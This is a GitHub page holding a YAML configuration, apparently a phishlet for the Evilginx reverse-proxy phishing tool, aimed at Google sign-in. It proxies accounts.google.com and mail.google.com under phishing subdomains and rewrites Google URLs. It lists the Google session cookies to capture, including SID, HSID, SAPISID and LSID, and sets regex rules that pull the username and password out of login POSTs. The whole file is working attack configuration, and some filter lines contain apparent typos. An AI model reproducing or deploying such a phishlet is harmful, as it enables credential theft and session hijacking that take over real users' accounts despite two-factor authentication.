forked from elktarni/google.yaml
-
Notifications
You must be signed in to change notification settings - Fork 0
/google
44 lines (43 loc) · 5.06 KB
/google
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
name: 'google'
author: '@elk'
min_ver: '2.3.0'
proxy_hosts:
- {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true}
- {phish_sub: 'mail', orig_sub: 'mail', domain: 'google.com', session: true, is_landing: false}
- {phish_sub: 'drive', orig_sub: 'drive', domain: 'google.com', session: false, is_landing: false}
sub_filters:
- {triggers_on: 'wwww.google.com', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname}/accounts/', replace: 'https://{hostname}/accounts/', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/ServiceLogin', replace: 'https://{hostname}/ServiceLogin', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'business.google.com', orig_sub: 'business', domain: 'google.com', search: 'https://{hostname}/add/', replace: 'https://{hostname}/add/', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/ManageAccount', replace: 'https://{hostname}/ManageAccount', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/OAuthLogin', replace: 'https://{hostname}/OAuthLogin', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/Logout', replace: 'https://{hostname}/Logout', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'ssl.gstatic.com', orig_sub: 'ssl', domain: 'gstatic.com', search: 'https://{hostname}/accounts', replace: 'https://{hostname}/accounts', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'ssl.gstatic.com', orig_sub: 'ssl', domain: 'gstatic.com', search: 'https://{hostname}/accounts/signup/', replace: 'https://{hostname}/accounts/signup/', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'ssl.gstatic.com', orig_sub: 'ssl', domain: 'gstatic.com', search: 'https://{hostname}/accounts/embedded/', replace: 'https://{hostname}/accounts/embedded/', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'ssl.gstatic.com', orig_sub: 'ssl', domain: 'gstatic.com', search: 'https://{hostname}/accounts/speedbump/', replace: 'https://{hostname}/accounts/speedbump/', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'support.google.com', orig_sub: 'support', domain: 'google.com', search: 'https://{hostname}/accounts', replace: 'https://{hostname}/accounts', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/TOS', replace: 'https://{hostname}TOS', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'sites.google.com', orig_sub: 'sites', domain: 'google.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/signin/v2', replace: 'https://{hostname}/signin/v2', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/speedbump/', replace: 'https://{hostname}/speedbump/', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/signin/', replace: 'https://{hostname}/signin/', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/CheckCookie', replace: 'https://{hostname}/CheckCookie', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
- domain: 'accounts.google.com'
keys: ['GAPS','LSID','__utmt','__utma','__utmz','__utmb','ACCOUNT_CHOOSER']
- domain: 'google.com'
keys: ['SID','HSID','SSID','APISID','SAPISID','NID','OGPC','OGP','1P_JAR','CONSENT']
credentials:
username:
key: 'identifier'
search: '(.*)'
type: 'post'
password:
key: 'password'
search: '(.*)'
type: 'post'
landing_path:
- '/signin/v2/identifier'